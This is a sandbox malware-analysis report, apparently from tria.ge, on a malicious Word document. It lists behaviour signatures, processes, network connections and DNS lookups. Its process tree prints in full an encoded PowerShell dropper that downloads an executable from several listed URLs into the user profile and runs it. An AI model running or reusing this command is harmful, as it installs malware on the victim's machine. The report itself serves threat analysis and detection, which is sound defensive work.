Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

task1

 

6

task2

 

5

Analysis

  • max time kernel
    59s
  • max time network
    11651379494s
  • resource
    win10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_cdf406976d2e6c1e011078a5991ec178.suspected

  • Sample

    190926-pv3et13hza

  • SHA256

    21b2b7e92c8f7e405062af2ecca54753fb6fe4f93000d262cd1bae4f89c81310

Score
N/A

Malware Config

Signatures

  • Suspicious behavior: AddClipboardFormatListener
  • Suspicious use of SetWindowsHookEx
  • Drops Office document 4 IoCs
    dropperexploitermaldoc
  • Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cdf406976d2e6c1e011078a5991ec178.suspected.doc" /o ""
    1⤵
    • Drops Office document
    • Checks system information in the registry (likely anti-VM)
    • Enumerates system info in registry
    • Checks processor information in registry (likely anti-VM)
    PID:988
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3732
  • C:\Windows\System32\SLUI.exe
    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
    1⤵
      PID:3844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABZAEEAWgBjAEMAWgBCAD0AKAAnAG0AJwArACcAdwAxAFUAQQBDACcAKQA7ACQAdABBAEEARwBBAEMAPQAmACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AUQB3AGMAQQBEAD0AKAAnAGgAdAB0AHAAOgAvAC8AdwB3AHcAJwArACcALgBiACcAKwAnAGkAbABnACcAKwAnAGkAZQBnAGkAdABpACcAKwAnAG0AbwBuAGwAaQBuAGUALgBjAG8AbQAnACsAJwAvAHcAcAAtAGEAZABtAGkAbgAvAG0AWABXAHAAJwArACcALwBAAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8ALwB3AHcAJwArACcAdwAuAHkAJwArACcAYQBuACcAKwAnAGoAaQBhAG8AJwArACcAegBoAGEAJwArACcAbgAuAGMAbwBtACcAKwAnAC8AdwAnACsAJwBwAC0AaQBuAGMAbAB1ACcAKwAnAGQAZQBzACcAKwAnAC8AdQBnADcALwBAAGgAdAB0AHAAOgAvAC8AYgBhAHIAYQBiAG8AbwBzAGUAbgBpAG8AcgBoAGkAZwBoAC4AYwBvAG0AJwArACcALwBFAG4ALwBKAEgAUwAnACsAJwAvAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwB3AHcAdwAuAG0AYQBqAG8AcgBpAHMAdABhAG4AYgB1AGwALgAnACsAJwBjAG8AbQAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwAxACcAKwAnAE8AJwArACcARgAvAEAAaAB0AHQAcAA6AC8AJwArACcALwBiAGwAbwAnACsAJwBvAGQAeQBiAGkAdABzAC4AYwBvACcAKwAnAG0ALwBlACcAKwAnAGQAdwBpAG4AagBlAGYAZgBlAHIAcwBvAG4ALgAnACsAJwBjAG8AbQAvACcAKwAnAGoAeAAnACsAJwA3AC8AJwApAC4AKAAnAFMAcABsACcAKwAnAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAGMAbwBaAEEAQQBBAHcAQQA9ACgAJwBhAFoAJwArACcAWgBVACcAKwAnAEMAQQBBAEEAJwApADsAJAB6AEIAQQBCAEQAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANAA5ACcAKQA7ACQAWABEAEEAQQBBAEEAPQAoACcASABjACcAKwAnAG8AQQBVAEEAQQBRACcAKQA7ACQATwBVAEIAQQA0AFUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHoAQgBBAEIARABVADQAQQArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGQAWABjAEEAeABBAFEAIABpAG4AIAAkAG8AUQB3AGMAQQBEACkAewB0AHIAeQB7ACQAdABBAEEARwBBAEMALgAoACcARABvAHcAJwArACcAbgAnACsAJwBsAG8AYQAnACsAJwBkAEYAaQBsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAGQAWABjAEEAeABBAFEALAAgACQATwBVAEIAQQA0AFUAKQA7ACQARABBAEcAVQBVAEEAVQA9ACgAJwBPACcAKwAnAFEAQwBCAGsAawBHACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABPAFUAQgBBADQAVQApAC4AIgBMAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewAmACgAJwBJACcAKwAnAG4AJwArACcAdgBvACcAKwAnAGsAZQAtAEkAdABlAG0AJwApACAAJABPAFUAQgBBADQAVQA7ACQAUgBBAEIAYwBVADQARABBAD0AKAAnAHAAJwArACcAQQB4AEMAWgAnACsAJwBVACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABoAEEAVQBEAEQAQQA9ACgAJwBJAFgAawAnACsAJwBRADEAJwArACcAeAAnACkAOwA=
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3812

    Network

    • 47.94.209.126:443
      www.yanjiaozhan.com
      382 B
       3.6kB
       3
      3
    • 52.109.12.23:443
      nexus.officeapps.live.com
      4.6kB
       10.1kB
       12
      8
    • 193.29.63.133:1688
      kms8.msguides.com
      524 B
       464 B
       3
      3
    • 52.109.76.30:443
      nexusrules.officeapps.live.com
      1.6kB
       9.9kB
       4
      4
    • 213.190.6.4:80
      http://bloodybits.com/edwinjefferson.com/jx7/
      87 B
       2.7kB
       1
      1

      HTTP Request

      GET http://bloodybits.com/edwinjefferson.com/jx7/

      HTTP Response

      404 Not Found
    • 52.109.88.8:443
      officeclient.microsoft.com
      757 B
       23.1kB
       3
      4
    • 3.83.101.55:80
      barabooseniorhigh.com
    • 94.73.147.19:80
      http://www.majoristanbul.com/cgi-bin/1OF/
      83 B
       1.5kB
       1
      1

      HTTP Request

      GET http://www.majoristanbul.com/cgi-bin/1OF/

      HTTP Response

      404 Not Found
    • 8.8.8.8:53
      bloodybits.com
      74 B
       90 B
       1
      1

      DNS Request

      bloodybits.com

      DNS Response

      213.190.6.4

    • 8.8.8.8:53
      kms8.msguides.com
      77 B
       136 B
       1
      1

      DNS Request

      kms8.msguides.com

      DNS Response

      193.29.63.133

    • 8.8.8.8:53
      www.majoristanbul.com
      81 B
       111 B
       1
      1

      DNS Request

      www.majoristanbul.com

      DNS Response

      94.73.147.19

    • 8.8.8.8:53
      barabooseniorhigh.com
      81 B
       97 B
       1
      1

      DNS Request

      barabooseniorhigh.com

      DNS Response

      3.83.101.55

    • 8.8.8.8:53
      officeclient.microsoft.com
      86 B
       209 B
       1
      1

      DNS Request

      officeclient.microsoft.com

      DNS Response

      52.109.88.8

    • 8.8.8.8:53
      nexus.officeapps.live.com
      85 B
       147 B
       1
      1

      DNS Request

      nexus.officeapps.live.com

      DNS Response

      52.109.12.23

    • 8.8.8.8:53
      nexusrules.officeapps.live.com
      90 B
       155 B
       1
      1

      DNS Request

      nexusrules.officeapps.live.com

      DNS Response

      52.109.76.30

    • 10.0.0.255:137
      1.3kB
       13
    • 8.8.8.8:53
      www.bilgiegitimonline.com
      85 B
       146 B
       1
      1

      DNS Request

      www.bilgiegitimonline.com

    • 8.8.8.8:53
      www.yanjiaozhan.com
      79 B
       95 B
       1
      1

      DNS Request

      www.yanjiaozhan.com

      DNS Response

      47.94.209.126

    MITRE ATT&CK Enterprise v16

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.